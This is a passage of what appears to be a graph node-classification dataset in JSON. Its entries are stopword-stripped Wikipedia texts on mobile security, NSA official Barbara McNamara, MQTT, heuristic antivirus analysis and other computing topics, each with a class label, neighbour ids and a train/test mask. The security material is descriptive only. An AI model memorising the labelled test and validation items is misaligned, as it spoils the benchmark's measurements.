mechanism prevents user re-identify connection however attacker could create wifi access point twin parameters characteristics real network using fact smartphones remember networks could confuse two networks connect network attacker intercept data transmit data encrypted form lasco worm initially infects remote device using sis file format sis file format software installation script script file executed system without user interaction smartphone thus believes file come trusted source downloads infecting machine security issues related bluetooth mobile devices studied shown numerous problems different phones one easy exploit vulnerability unregistered services require authentication vulnerable applications virtual serial port used control phone attacker needed connect port take full control device another example phone must within reach bluetooth discovery mode attacker sends file via bluetooth recipient accepts virus transmitted example cabir worm spreads via bluetooth connection worm searches nearby phones bluetooth discoverable mode sends target device user must accept incoming file install program installing worm infects machine attacks based flaws os applications phone mobile web browser emerging attack vector mobile devices common web browsers mobile web browsers extended pure web navigation widgets plug-ins completely native mobile browsers jailbreaking iphone firmware 1.1.1 based entirely vulnerabilities web browser result exploitation vulnerability described underlines importance web browser attack vector mobile devices case vulnerability based stack-based buffer overflow library used web browser libtiff vulnerability web browser android discovered october 2008 iphone vulnerability due obsolete vulnerable library significant difference iphone vulnerability android sandboxing architecture limited effects vulnerability web browser process smartphones also victims classic piracy related web phishing malicious websites software run background etc big difference smartphones yet strong antivirus software available sometimes possible overcome security safeguards modifying operating system real-world examples section covers manipulation firmware malicious signature certificates attacks difficult 2004 vulnerabilities virtual machines running certain devices revealed possible bypass bytecode verifier access native underlying operating system results research published detail firmware security nokia symbian platform security architecture psa based central configuration file called swipolicy 2008 possible manipulate nokia firmware installed fact downloadable versions file human readable possible modify change image firmware vulnerability solved update nokia theory smartphones advantage hard drives since os files rom changed malware however systems possible circumvent symbian os possible overwrite file file name windows os possible change pointer general configuration file editable file application installed signing application verified series certificates one create valid signature without using valid certificate add list symbian os certificates directory firmware changes explained easy insert seemingly valid malicious certificate 2015 researchers french government agency agence nationale de la sécurité des systèmes d'information anssi demonstrated capability trigger voice interface certain smartphones remotely using specific electromagnetic waveforms exploit took advantage antenna-properties headphone wires plugged audio-output jacks vulnerable smartphones effectively spoofed audio input inject commands via audio interface juice jacking physical hardware vulnerability specific mobile platforms utilizing dual purpose usb charge port many devices susceptible data exfiltrated malware installed onto mobile device utilizing malicious charging kiosks set public places hidden normal charge adapters jail-breaking also physical access vulnerability mobile device users initiate hack devices unlock exploit weaknesses operating system mobile device users take control device jail-breaking customize interface installing applications change system settings allowed devices thus allowing tweak mobile devices operating systems processes run programs background thus devices expose variety malicious attack lead compromise important private data 2010 researcher university pennsylvania investigated possibility cracking device password smudge attack literally imaging finger smudges screen discern user password researchers able discern device password 68 time certain conditions outsiders may perform over-the-shoulder victims watching specific keystrokes pattern gestures unlock device password passcode smartphones permanent point access internet mostly compromised easily computers malware malware computer program aims harm system resides mobile malware variants increased 54 year 2017 trojans worms viruses considered malware trojan program smartphone allows external users connect discreetly worm program reproduces multiple computers across network virus malicious software designed spread computers inserting legitimate programs running programs parallel however must said malware far less numerous important smartphones computers nonetheless recent studies show evolution malware smartphones rocketed last years posing threat analysis detection typically attack smartphone made malware takes place 3 phases infection host accomplishment goal spread malware systems malware often uses resources offered infected smartphones use output devices bluetooth infrared may also use address book email address person infect user acquaintances malware exploits trust given data sent acquaintance infection means used malware get smartphone either use one faults previously presented may use gullibility user infections classified four classes according degree user interaction malware infected phone also seek accomplish goal usually one following monetary damage damage data and/or device concealed damage malware infected smartphone always aims spread one way another various malware exist world smartphones short description mobile ransomware type malware locks users mobile devices pay-to-unlock-your-device ploy grown leaps bounds threat category since 2014 specific mobile computing platforms users often less security-conscious particularly pertains scrutinizing applications web links trusting native protection capability mobile device operating system mobile ransomware poses significant threat businesses reliant instant access availability proprietary information contacts likelihood traveling businessman paying ransom unlock device significantly higher since disadvantage given inconveniences timeliness less likely direct access staff recent ransomware attack caused stir world attack caused many internet connected devices work companies spent large amount recover attacks diagram loads different behaviors smartphone malware terms effects smartphones see graph least 50 malware varieties exhibit negative behavior except ability spread multitude malware partly due variety operating systems smartphones however attackers also choose make malware target multiple platforms malware found attacks os able spread different systems begin malware use runtime environments like java virtual machine .net framework also use libraries present many operating systems malware carry several executable files order run multiple environments utilize propagation process practice type malware requires connection two operating systems use attack vector memory cards used purpose synchronization software used propagate virus security mechanisms place counter threats described presented section divided different categories act level range management security operating system behavioral education user threats prevented various measures depending case considering two cases mentioned first case one would protect system corruption application second case installation suspicious software would prevented first layer security smartphone operating system os beyond needing handle usual roles operating system e.g resource management scheduling processes device must also establish protocols introducing external applications data without introducing risk central paradigm mobile operating systems idea sandbox since smartphones currently designed accommodate many applications must mechanisms ensure applications safe phone applications data system user malicious program reaches mobile device vulnerable area presented system must small possible sandboxing extends idea compartmentalize different processes preventing interacting damaging based history operating systems sandboxing different implementations example ios focus limiting access public api applications app store default managed open allows restrict apps access types data android bases sandboxing legacy linux trustedbsd following points highlight mechanisms implemented operating systems especially android operating system security layer security software layer composed individual components strengthen various vulnerabilities prevent malware intrusions identification user human user authentication contains software components learned experience computer security however smartphones software must deal greater constraints see limitations mobile antivirus product would scan files compare database known mobile malware code signatures application passes various security barriers take actions designed actions triggered activity malicious application sometimes detected one monitors various resources used phone depending goals malware consequences infection always malicious applications intended harm devices deployed following sections describe different ways detect suspicious activity various points mentioned indications provide certainty legitimacy activity application however criteria help target suspicious applications especially several criteria combined network traffic exchanged phones monitored one place safeguards network routing points order detect abnormal behavior mobile use network protocols much constrained computer expected network data streams predicted e.g protocol sending sms permits detection anomalies mobile networks production distribution chain mobile devices responsibility manufacturers ensure devices delivered basic configuration without vulnerabilities users experts many aware existence security vulnerabilities device configuration provided manufacturers retained many users listed several points manufacturers consider much malicious behavior allowed carelessness user smartphone users found ignore security messages application installation especially application selection checking application reputation reviews security agreement messages simply leaving device without password precise control permissions granted applications added smartphone user large responsibility cycle security vector intrusion precaution especially important user employee company stores business data device detailed precautions user take manage security smartphone recent survey internet security experts bullguard showed lack insight rising number malicious threats affecting mobile phones 53 users claiming unaware security software smartphones 21 argued protection unnecessary 42 admitted n't crossed mind using apa 2011 statistics show consumers concerned security risks believe serious problem key always remember smartphones effectively handheld computers vulnerable latest android smartphones come inbuilt encryption setting securing information saved device makes difficult hacker extract decipher information case device compromised settings – security – encrypt phone encrypt sd card precautions measures leave easy solution intrusion people malicious applications smartphone users careful many attacks defeated especially phishing applications seeking obtain rights device one form mobile protection allows companies control delivery storage text messages hosting messages company server rather sender receiver phone certain conditions met expiration date messages deleted security mechanisms mentioned article large extent inherited knowledge experience computer security elements composing two device types similar common measures used antivirus software firewalls however implementation solutions necessarily possible least highly constrained within mobile device reason difference technical resources offered computers mobile devices even though computing power smartphones becoming faster limitations computing power furthermore common find updates exist developed deployed always done one example find user know newer version operating system compatible smartphone user may discover known vulnerabilities corrected end long development cycle allows time exploit loopholes expected four mobile environments make security framework",
    "neighbors": [
      3072,
      5636,
      5637,
      6,
      9732,
      10245,
      10756,
      11272,
      9227,
      11277,
      9744,
      9233,
      9242,
      9761,
      2084,
      9256,
      3626,
      9771,
      3629,
      7730,
      10297,
      1083,
      3643,
      7739,
      9791,
      1088,
      1602,
      4165,
      11333,
      10329,
      3162,
      10332,
      107,
      6763,
      2678,
      8313,
      6779,
      5245,
      5246,
      11391,
      10880,
      6786,
      5764,
      8849,
      4245,
      10392,
      10393,
      1690,
      6301,
      5281,
      2213,
      7336,
      10924,
      7855,
      3262,
      8387,
      7368,
      10442,
      5325,
      2259,
      2262,
      6360,
      4314,
      6884,
      6373,
      5872,
      5875,
      2804,
      4344,
      3320,
      10492,
      5373,
      4863,
      1279,
      2818,
      6916,
      9488,
      7441,
      8978,
      4883,
      2837,
      278,
      3867,
      4892,
      5404,
      8998,
      11048,
      300,
      3887,
      7983,
      823,
      5433,
      11584,
      3395,
      7492,
      11588,
      838,
      1355,
      4435,
      7515,
      4956,
      4957,
      9055,
      3941,
      11621,
      9063,
      4972,
      877,
      9591,
      899,
      7044,
      9607,
      9102,
      3473,
      7579,
      10141,
      2975,
      9640,
      939,
      9646,
      1970,
      4023,
      6588,
      3525,
      7624,
      9160,
      2508,
      8657,
      3032,
      9688,
      8668,
      10207,
      10209,
      9187,
      11244,
      1524,
      3573,
      2041,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9357,
    "label": 4,
    "text": "Barbara_McNamara:barbara mcnamara barbara a. mcnamara born circa 1942 nsa deputy director october 1997 june 2000 succeeded william b black jr.. mcnamara joined nsa 1963 chinese linguist rose number analytic operational managerial positions leaving operational directorate 1983 mcnamara became first woman named deputy director operations 1994 1997 became second woman named agency deputy director june 2000 received us intelligence community highest award national intelligence distinguished service medal time one highest ranked women united states intelligence community served nsa senior u.s. liaison officer london england shortly retirement 2003 currently board member signalscape intec billing",
    "neighbors": [
      289,
      4898,
      7137,
      10305,
      11302,
      327,
      266,
      6668,
      365,
      4719,
      7887,
      2897,
      1714,
      10832,
      4566,
      2712,
      6749
    ],
    "mask": "None"
  },
  {
    "node_id": 9358,
    "label": 7,
    "text": "Style_Jukebox:style jukebox style jukebox hi-fi high-resolution audio cloud music streaming storage player windows ios android windows phone platforms web player also available mac windows linux style jukebox allows users upload personal music collection computer style jukebox servers listen another compatible device android ios windows mac windows phone streaming downloading songs offline playback basic accounts 10 gb storage pro accounts 2 tb music july 2016 style jukebox 250,000 registered users december 1st 2017 style jukebox discontinued service small post home page details released style jukebox consists cloud-based services user management music storage programmatic interfaces apis clients music streaming storage desktop mobile operating systems upload available desktop client style jukebox enables users drop music files folders music player automatically uploaded synced style jukebox cloud-based services made available user computers devices also style jukebox client installed style jukebox cloud-based services automatically transcodes formats match device supported formats example 320kbit/s wma transcoded 320kbit/s mp3 ios devices flac lossless transcoded wma lossless windows phone devices",
    "neighbors": [
      10368,
      5612,
      6797,
      11063,
      4623,
      3152,
      753,
      7983,
      119,
      823,
      11037
    ],
    "mask": "Test"
  },
  {
    "node_id": 9359,
    "label": 2,
    "text": "Nokia_E63:nokia e63 nokia e63 budget business smartphone announced 12 november 2008 released later year based symbian s60 platform although looks similar nokia e71 fascia made plastic aluminium e71 plastic chassis also keypad made different material laid slightly different e71 many specifications identical e71 except lack gps infrared lesser ram lack hsdpa lower-quality camera fixed-focus lens e63 come ability use camera flash light present e71 also standard 3.5 mm audio jack e71 uses 2.52 mm jack e63 retailed 199 euros taxes specifications current firmware version 510.21.010 released 28 march 2011 operating frequency",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      8627,
      7220,
      821,
      5175,
      7866,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9163,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 9360,
    "label": 1,
    "text": "SQL_Anywhere:sql anywhere sap sql anywhere proprietary relational database management system rdbms product sap sql anywhere known sybase sql anywhere prior acquisition sybase sap sql anywhere run windows windows ce mac os x various unix platforms including linux aix hp-ux solaris database files independent operating system allowing copied supported platforms product provides several standard interfaces odbc jdbc ado.net number special interfaces php perl engine supports stored procedures user functions using watcom sql t-sql java c/c++ triggers referential integrity row-level locking replication high availability proxy tables events scheduled system events strong encryption supported database files client-server communication sql anywhere used several contexts including embedded database particularly application data store example used intuit quickbooks network management products backup products ability used minimal administration distinguishing feature role used database server work groups small medium-sized businesses also function mobile database includes scalable data synchronization technology provides change-based replication separate databases including large server-based rdbms systems sql anywhere server high performing embeddable relational database-management system rdbms scales thousands users server environments desktop mobile applications used widely deployed zero-administration environments ultralite ultralite database-management system designed small-footprint mobile devices pdas smart phones mobilink mobilink highly-scalable session-based synchronization technology exchanging data among relational databases non-relational data sources qanywhere qanywhere facilitates development robust secure store-and-forward mobile messaging applications sql remote sql remote technology based store forward architecture allows occasionally connected users synchronize data sql anywhere databases using file message transfer mechanism",
    "neighbors": [
      6147,
      8582,
      6797,
      270,
      10511,
      10389,
      10518,
      2456,
      1304,
      1049,
      5403,
      2208,
      7080,
      10921,
      3629,
      10286,
      7983,
      9263,
      11189,
      823,
      5691,
      1856,
      321,
      8644,
      6993,
      9177,
      5210,
      10459,
      2780,
      734,
      7022,
      7409,
      8188,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 9361,
    "label": 2,
    "text": "SHARE_Operating_System:share operating system share operating system sos created 1959 improvement general motors gm-naa i/o operating system first operating system share user group main target improve sharing programs gm-naa i/o share operating system provided new methods manage buffers input/output devices like gm-naa i/o allowed execution programs written assembly language initially worked ibm 709 computer transistorized compatible successor ibm 7090 series articles describing innovations system appears april 1959 journal association computing machinery 1962 ibm discontinued support sos announced entirely new incompatible operating system ibm 7090/94 ibsys",
    "neighbors": [
      2179,
      4996,
      10883,
      7053,
      8077,
      6675,
      9468,
      789,
      5397,
      11673,
      9370,
      6557,
      3359,
      421,
      7848,
      1323,
      7983,
      8879,
      7217,
      10803,
      7477,
      7733,
      10040,
      5562,
      573,
      1219,
      8388,
      6342,
      7504,
      1235,
      7507,
      477,
      863,
      868,
      3429,
      9829,
      6248,
      5484,
      5492,
      2168,
      3323,
      2172,
      2813,
      8063
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9362,
    "label": 2,
    "text": "DataAdapter:dataadapter ado.net dataadapter functions bridge data source disconnected data class dataset simplest level specify sql commands provide elementary crud functionality advanced level offers functions required order create strongly typed datasets including datarelations data adapters integral part ado.net managed providers set objects used communicate data source dataset addition adapters managed providers include connection objects data reader objects command objects adapters used exchange data data source dataset many applications means reading data database dataset writing changed data dataset back database however data adapter move data source dataset example could adapter moves data microsoft exchange server dataset sometimes data work primarily read-only rarely need make changes underlying data source situations also call caching data memory minimize number database calls data change data adapter makes easy accomplish things helping manage data disconnected mode data adapter fills dataset object reading data writes single batch persisting changes back database data adapter contains reference connection object opens closes connection automatically reading writing database additionally data adapter contains command object references select insert update delete operations data data adapter defined table dataset take care communication database need tell data adapter load write database",
    "neighbors": [
      736,
      9348,
      10413,
      9263
    ],
    "mask": "Test"
  },
  {
    "node_id": 9363,
    "label": 3,
    "text": "Influence_of_the_IBM_PC_on_the_personal_computer_market:influence ibm pc personal computer market following introduction ibm personal computer ibm pc many personal computer architectures became extinct within years ibm pc introduced personal computer market dominated systems using 6502 z80 8-bit microprocessors trs 80 commodore pet apple ii series used proprietary operating systems computers running cp/m ibm introduced ibm pc 1984 ibm pc clones became dominant computers 1983 byte forecast 1990 ibm would command 11 business computer sales commodore predicted hold slim lead highly competitive market 11.9 around 1978 several 16-bit cpus became available examples included data general mn601 fairchild 9440 ferranti f100-l general instrument cp1600 cp1610 national semiconductor ins8900 panafacom mn1610 texas instruments tms9900 notably intel 8086 new processors expensive incorporate personal computers used 16-bit data bus needed rare thus expensive 16-bit peripheral support chips 50 new business-oriented personal computer systems came market year ibm released ibm pc used 16- 32-bit microprocessor 8-bit systems generally believed vendors perfectly adequate intel 8086 expensive use main manufacturers selling 8-bit business systems period august 12 1981 ibm released ibm personal computer one far-reaching decisions made ibm pc use open architecture leading large market third party add-in boards applications finally also many competitors creating ibm-compatible machines ibm pc used then-new intel 8088 processor like 16-bit cpus could access 1 megabyte ram used 8-bit-wide data bus memory peripherals design allowed use large readily available relatively inexpensive family 8-bit-compatible support chips ibm decided use intel 8088 first considering motorola 68000 intel i8086 two considered powerful needs although already established rivals like apple radio shack many advantages company new microcomputers ibm reputation business computing allowed ibm pc architecture take substantial market share business applications many small companies sold ibm-compatible software hardware rapidly grew size importance including tecmar quadram ast research microsoft mid-1982 three mainframe minicomputer companies sold microcomputers unlike ibm hewlett-packard xerox control data corporation chose cp/m operating system many companies made business personal computers using proprietary designs still using 8-bit microprocessors ones used intel x86 processors often used generic non-ibm-compatible specific version ms-dos cp/m-86 8-bit systems intel 8080 compatible cpu normally used cp/m within year ibm pc introduction microsoft licensed ms-dos 70 companies one first computers achieve 100 pc compatibility compaq portable released november 1982 remained compatible clone 1984 pc yet dominate market however x86-based systems clones ibm pc design different internal designs like cp/m-based 8-bit systems preceded ibm pc difficult obtain several years introduction many makers ms-dos computers intentionally avoided full ibm compatibility expected market infoworld described ordinary pc clones would decline shortage real pcs ended feared fate companies sold computers plug-compatible ibm mainframes 1960s 1970s—many went bankrupt ibm changed specifications—and believed market existed personal computers similar selection software ibm pc better hardware even years ibm pc introduction manufacturers digital hp sanyo tandy texas instruments tulip computers nec wang laboratories xerox continued introduce personal computers barely compatible ibm pc even though used x86 processors ran ms-dos used ms-dos way microsoft originally envisioned way 8-bit systems used cp/m implemented standard rom bios routines achieve hardware independence 8080 z80 compatibles machine different bios long software made standard ms-dos calls would ensure compatibility microsoft used sophisticated installer dos programs like multiplan provided device drivers many non ibm pc-compatible computers software vendors columbia university discussed difficulty kermit support many different clones ms-dos computers peter norton earlier encouraged vendors write software ran many different computers early 1985 admitted—after experiencing difficulty rewriting norton utilities—that practical way software creators write generic software dealers found carrying multiple versions software clones varying levels compatibility difficult get best results 8088 modest performance many popular software applications written specifically ibm pc developers programs opted write directly computer video memory peripheral chips bypassing ms-dos bios example program might directly update video refresh memory instead using ms-dos calls device drivers alter appearance screen many notable software packages spreadsheet program lotus 1-2-3 microsoft microsoft flight simulator 1.0 directly accessed ibm pc hardware bypassing bios therefore work computers even trivially different ibm pc especially common among pc games result systems fully ibm pc-compatible could n't run software quickly became obsolete rendered obsolete cp/m-inherited concept oem versions ms-dos meant run bios calls non ibm-pc hardware 1984 phoenix technologies began licensing clone ibm pc bios phoenix bios competitors ami bios made possible anyone market pc compatible computer without develop compatible bios like compaq although based i8086 enabling creation relatively low-cost x86-based systems intel 80186 quickly lost appeal x86-based pc builders supporting circuitry inside intel 80186 chip incompatible used standard pc chipset implemented ibm rarely used personal computers 1982 february 1984 byte described personal computer market seems shadowed cloud compatibility drive compatible ibm personal computer family assumed near-fetish proportions stated inevitable light phenomenal market acceptance ibm pc magazine cited announcement north star fall 1983 first pc-compatible microcomputer founded 1976 north star long successful 8-bit s-100 bus products introduced proprietary 16-bit products company acknowledged ibm pc become standard one north star needed follow byte described announcement representative great impact ibm made industry magazine expressed concern ibm burgeoning influence pc community stifling innovation many companies mimicking big blue admitting dealers asked kaypro also introduced company first ibm compatible year tandy—which much 60 personal-computer market attempted keep technical information secret monopolize software peripheral sales—also began selling non-proprietary computers four years jon shirley predicted infoworld new ibm pc major market would ibm addicts magazine 1985 similarly called ibm compatibility tandy 1000 small concession big blue dominating stranglehold company struggling openly blood-soaked arena personal computers 1000 compatible pc compatible tandy 2000 ms-dos computer ibm mainframe rivals bunch introduced compatibles hewlett-packard introduced vectra infoworld stated company responding demands customers full ibm pc compatibility mitch kapor lotus development corporation said 1984 either pc-compatible special compatibility proven safe path microsoft executive jim harris stated 1985 infoworld wrote ibm competitors whipped conformity designs total failure every company tried improve ibm pc customers wanted run pc applications like 1-2-3 developers cared massive pc installed base non-compatible—no matter technical superiority—from company apple failed lack customers software compatibility became important dave winer joked year referring pc incomplete compatibility ibm pc company introduce machine n't pc compatible survive ibm 1985 shortage ibm pcs ended causing financial difficulties many vendors compatibles nonetheless harris said ones done worse compatibles noncompatibles pc standard similarly dominant europe honeywell bull olivetti ericsson selling compatibles software companies focusing pc products end year pc magazine stated even ibm could longer introduce rumored proprietary non-compatible operating system noting company unsuccessful pcjr cardinal sin n't pc compatible magazine wrote backward compatibility ibm pc single largest concern hardware software developers user community large demanding accept radical changes abandon solutions worked past within years introduction fully compatible pc clones almost rival business personal computer systems alternate x86 using architectures gone market despite inherent dangers industry based de facto standard thriving pc clone industry emerged non-ibm pc-compatible systems remained systems classified home computers apple ii series business systems offered features available ibm pc high level integration e.g. bundled accounting inventory fault-tolerance multitasking multi-user features compaq prices comparable ibm company emphasized pc compatibles features quality corporate customers mid-1985 compute described wave inexpensive clones american asian companies caused prices decline end 1986 equivalent 1600 real ibm pc 256k ram two disk drives cost little 600 lower price apple iic consumers began purchasing dos computers home large numbers tandy estimated half 1000 sales went homes new leading edge model comprised 1 us home-computer market year toy discount stores sold clone made hyundai like stereo without demonstrator model salesman tandy inexpensive clones succeeded consumers—who saw superior lower-end game machines—where ibm failed two years earlier pcjr inexpensive home computers years earlier comparable price commodore amiga atari st apple iigs unlike pcjr clones fast faster ibm pc highly compatible users could bring work home large dos software library reassured worried orphaned technology consumers used spreadsheets entertainment former ability justifying buying computer could also perform latter pcs compatibles also gained significant share educational market longtime leader apple lost share january 1987 consumer electronics show commodore atari announced clones 1987 pc industry growing quickly formerly business-only platform become largest important market computer game companies outselling games apple ii commodore 64 ega video card inexpensive clone better games computers 1989 80 readers compute owned dos computers magazine announced greater emphasis ms-dos home computing ibm influence industry decreased competition increased rivals introduced computers improved ibm designs maintaining compatibility 1986 compaq deskpro 386 first computer based intel 80386 1987 ibm unsuccessfully attempted regain leadership market personal system/2 line proprietary microchannel architecture 1990 computer gaming world told reader complaining many reviews pc games companies attempting get ms-dos products door first reported ms-dos comprised 65 computer-game market amiga 10 computers including macintosh 10 declining amiga others st various msx2 computers remained market pc compatibles gained sufficient multimedia capabilities compete home computers advent inexpensive versions vga video card sound blaster sound card clones remaining home computers driven market 1995 macintosh almost new consumer-oriented systems sold ibm pc clones macintosh originally used motorola 68000 family processors later migrating powerpc architecture throughout 1990s apple would steadily transition macintosh platform proprietary expansion interfaces use standards pc world ide pci usb 2006 apple converted macintosh intel x86 architecture modern macintosh computers essentially ibm pc compatibles capable booting microsoft windows running ibm pc-compatible software still retain unique design elements support apple mac os x operating system 2008 sid meier listed ibm pc one three important innovations history video games shortly ibm pc released obvious split appeared systems opted use x86-compatible processor chose another architecture almost x86 systems provided version ms-dos others used many different operating systems although z80-based systems typically offered version cp/m common usage ms-dos unified x86-based systems promoting growth x86/ms-dos ecosystem non-x86 architectures died x86 systems standardized fully ibm pc compatible clones market filled dozens different competing systems reduced near-monoculture x86-based ibm pc compatible ms-dos systems early launch ibm pc 1981 still dozens systems ibm pc-compatible use intel x86 chips used intel 8088 8086 80186 processors almost without exception offered oem version ms-dos opposed oem version customized ibm use however generally made attempt copy ibm pc architecture machines different i/o addresses different system bus different video controllers differences original ibm pc differences sometimes rather minor used improve upon ibm pc design result differences software directly manipulated hardware would run correctly cases x86-based systems n't use fully ibm pc compatible design n't sell well enough attract support software manufacturers though computer manufacturers arranged compatible versions popular applications developed sold specifically machines fully ibm pc-compatible clones appeared market shortly thereafter advantages cloning became impossible ignore notable systems x86-compatible real clones manufacturers immediately switched intel x86 microprocessor family ms-dos companies continued releasing systems based non-intel architectures systems used 32-bit microprocessor popular motorola 68000 others continued use 8-bit microprocessors many systems eventually forced market onslaught ibm pc clones although architectures may superior capabilities especially area multimedia pc architectures era often cga display sound system internal pc speaker three systems era extinct thriving legacies",
    "neighbors": [
      5377,
      4228,
      9732,
      5384,
      7432,
      9084,
      6539,
      9212,
      6797,
      1809,
      4114,
      6419,
      2846,
      4642,
      8355,
      3238,
      9006,
      8625,
      1202,
      4150,
      11447,
      4409,
      11068,
      9665,
      10436,
      10692,
      7243,
      9932,
      9166,
      3281,
      1515,
      9964,
      8301,
      10862,
      2159,
      4337,
      6129,
      499,
      7281,
      8561,
      4727,
      8700,
      1399
    ],
    "mask": "None"
  },
  {
    "node_id": 9364,
    "label": 4,
    "text": "Heuristic_analysis:heuristic analysis heuristic analysis method employed many computer antivirus programs designed detect previously unknown computer viruses well new variants viruses already wild heuristic analysis expert based analysis determines susceptibility system towards particular threat/risk using various decision rules weighing methods multicriteria analysis mca one means weighing method differs statistical analysis bases available data/statistics antivirus programs utilize heuristic analysis perform function executing programming commands questionable program script within specialized virtual machine thereby allowing anti-virus program internally simulate would happen suspicious file executed keeping suspicious code isolated real-world machine analyzes commands performed monitoring common viral activities replication file overwrites attempts hide existence suspicious file one virus-like actions detected suspicious file flagged potential virus user alerted another common method heuristic analysis anti-virus program decompile suspicious program analyze machine code contained within source code suspicious file compared source code known viruses virus-like activities certain percentage source code matches code known viruses virus-like activities file flagged user alerted heuristic analysis capable detecting many previously unknown viruses new variants current viruses however heuristic analysis operates basis experience comparing suspicious file code functions known viruses means likely miss new viruses contain previously unknown methods operation found known viruses hence effectiveness fairly low regarding accuracy number false positives new viruses discovered human researchers information added heuristic analysis engine thereby providing engine means detect new viruses heuristic analysis method detecting viruses examining code suspicious properties traditional methods virus detection involve identifying malware comparing code program code known virus types already encountered analyzed recorded database – known signature detection useful still use signature detection method also become limited due development new threats exploded around turn century continuing emerge time counter problem heuristic model specifically designed spot suspicious characteristics found unknown new viruses modified versions existing threats well known malware samples cybercriminals constantly developing new threats heuristic analysis one methods used deal huge volume new threats seen daily heuristic analysis also one methods capable combating polymorphic viruses — term malicious code constantly changes adapts heuristic analysis incorporated advanced security solutions offered companies like kaspersky labs detect new threats cause harm without need specific signature heuristic analysis employ number different techniques one heuristic method known static heuristic analysis involves de-compiling suspect program examining source code code compared viruses already known heuristic database particular percentage source code matches anything heuristic database code flagged possible threat another method known dynamic heuristics scientists want analyze something suspicious without endangering people contain substance controlled environment like secure lab conduct tests process similar heuristic analysis — virtual world isolates suspicious program piece code inside specialized virtual machine — sandbox — gives antivirus program chance test code simulate would happen suspicious file allowed run examines command activated looks suspicious behaviors self-replication overwriting files actions common viruses potential issues reported user heuristic analysis ideal identifying new threats effective heuristics must carefully tuned provide best possible detection new threats without generating false positives perfectly innocent code reason heuristic tools often typically one weapon sophisticated antivirus arsenal typically deployed along methods virus detection signature analysis proactive technologies",
    "neighbors": [
      2213,
      3944,
      2601,
      7739,
      7515,
      6430
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9365,
    "label": 5,
    "text": "MQTT:mqtt mqtt message queuing telemetry transport iso standard iso/iec prf 20922 publish-subscribe-based messaging protocol works top tcp/ip protocol suite designed connections remote locations small code footprint required network bandwidth limited publish-subscribe messaging pattern requires message broker andy stanford-clark ibm arlen nipper cirrus link authored first version protocol 1999 2013 ibm submitted mqtt v3.1 oasis specification body charter ensured minor changes specification could accepted mqtt-sn variation main protocol aimed embedded devices non-tcp/ip networks zigbee historically mq mqtt came ibm mq 'mqseries message queuing product line however queuing required supported standard feature situations alternative message-oriented middleware includes advanced message queuing protocol amqp streaming text oriented messaging protocol stomp ietf constrained application protocol xmpp dds opc ua web application messaging protocol wamp mqtt system consists clients communicating server often called broker client may either publisher information subscriber client connect broker information organized hierarchy topics publisher new item data distribute sends control message data connected broker broker distributes information clients subscribed topic publisher need data number locations subscribers subscribers turn configured data publishers broker receives topic current subscribers discard topic unless publisher indicates topic retained allows new subscribers topic receive current value rather waiting next update publisher publishing client first connects broker set default message sent subscribers broker detects publishing client unexpectedly disconnected broker clients interact broker system may contain several broker servers exchange data based current subscribers topics minimal mqtt control message little two bytes data control message carry nearly 256 megabytes data needed fourteen defined message types used connect disconnect client broker publish data acknowledge receipt data supervise connection client server mqtt relies tcp protocol data transmission variant mqtt-sn used transports udp bluetooth mqtt sends connection credentials plain text format include measures security authentication provided underlying tcp transport using measures protect integrity transferred information interception duplication waits connection established server creates link nodes waits mqtt client finish work must tcp/ip session disconnect returns immediately application thread passing request mqtt client connection broker specify quality service measure classified increasing order overhead field affect handling underlying tcp data transmissions used mqtt senders receivers several projects implement mqtt examples",
    "neighbors": [
      10242,
      11267,
      1030,
      6153,
      9225,
      8211,
      6681,
      6682,
      10271,
      6689,
      9251,
      2085,
      7208,
      7722,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      5181,
      6723,
      5700,
      8265,
      4687,
      7248,
      10341,
      10344,
      3695,
      4723,
      2679,
      4729,
      5251,
      649,
      9868,
      3218,
      11413,
      152,
      3742,
      9380,
      9381,
      3751,
      3752,
      7338,
      172,
      10924,
      6318,
      9909,
      4793,
      7865,
      4797,
      702,
      7364,
      8905,
      1229,
      5843,
      10461,
      7391,
      3297,
      2797,
      751,
      8432,
      8946,
      3322,
      3323,
      1280,
      9987,
      3847,
      10005,
      5402,
      5405,
      9511,
      7984,
      10035,
      8504,
      1849,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      10058,
      849,
      6993,
      1876,
      2904,
      7003,
      349,
      5469,
      5470,
      5471,
      5472,
      10589,
      871,
      11112,
      361,
      367,
      4979,
      6522,
      891,
      6524,
      11647,
      10115,
      6541,
      1935,
      3983,
      7570,
      5531,
      10144,
      10659,
      933,
      2983,
      10159,
      6577,
      2996,
      10171,
      3006,
      9670,
      2509,
      8669,
      8670,
      3042,
      10723,
      10727,
      3564,
      6651,
      3580,
      4095
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9366,
    "label": 2,
    "text": "Real-time_operating_system:real-time operating system real-time operating system rtos operating system os intended serve real-time applications process data comes typically without buffer delays processing time requirements including os delay measured tenths seconds shorter increments time real-time system time bound system well defined fixed time constraints processing must done within defined constraints system fail either event driven time sharing event driven systems switch tasks based priorities time sharing systems switch task based clock interrupts rtoss use pre-emptive scheduling algorithm key characteristic rtos level consistency concerning amount time takes accept complete application task variability 'jitter 'hard real-time operating system less jitter 'soft real-time operating system chief design goal high throughput rather guarantee soft hard performance category rtos usually generally meet deadline soft real-time os meet deadline deterministically hard real-time os rtos advanced algorithm scheduling scheduler flexibility enables wider computer-system orchestration process priorities real-time os frequently dedicated narrow set applications key factors real-time os minimal interrupt latency minimal thread switching latency real-time os valued quickly predictably respond amount work perform given period time see comparison real-time operating systems comprehensive list also see list operating systems types operating systems common designs time sharing designs switch tasks often strictly needed give smoother multitasking giving illusion process user sole use machine early cpu designs needed many cycles switch tasks cpu could nothing else useful example 20 mhz 68000 processor typical late 1980s task switch times roughly 20 